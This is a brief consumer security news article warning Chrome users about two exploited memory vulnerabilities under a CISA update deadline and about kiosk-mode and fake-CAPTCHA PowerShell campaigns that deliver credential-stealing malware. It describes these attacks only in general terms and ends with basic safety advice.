Sun Sep 15 11:31:43 UTC 2024: ## Chrome Users Face Double Whammy: Exploited Vulnerabilities and New CAPTCHA Attack
**September 16, 2024** – Google Chrome users have just 72 hours to update their browser to patch two critical vulnerabilities actively exploited by attackers, including a North Korean hacking group.
**Vulnerability Deadline Looms**
Two memory vulnerabilities, CVE-2024-7971 and CVE-2024-7965, were discovered in August and have been actively exploited by cybercriminals. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has mandated all federal employees update their Chrome browsers by September 16th to mitigate the threat.
**Beyond Vulnerabilities: A New CAPTCHA Attack**
While Chrome users rush to update, a new phishing attack targeting Google login credentials is gaining traction. This attack, first identified by OALABS Research, uses “kiosk mode” to trap users in a full-screen Google login page, forcing them to enter their credentials. Once entered, these credentials are then stolen by malware.
**Fake CAPTCHA Trickery**
Adding to the threat, researchers at Palo Alto Networks have discovered a fake CAPTCHA attack using malicious PowerShell scripts to install the Lumma Stealer malware. This malware steals user credentials, crypto wallets, and other sensitive information. The fake CAPTCHA encourages users to paste a malicious PowerShell script into a Run window, leading to the download and execution of the Lumma Stealer.
**Staying Safe**
Chrome users are urged to update their browser immediately to protect themselves from the exploited vulnerabilities. Additionally, be wary of any unusual CAPTCHA prompts or requests to run scripts. If you suspect an attack, close the browser window and restart your PC. Regularly run antivirus scans and keep your operating system and software up to date.
**The Bottom Line:**
Cybersecurity threats are constantly evolving. It’s crucial to stay informed and proactive. Follow these tips and keep your digital life safe.
First Piper 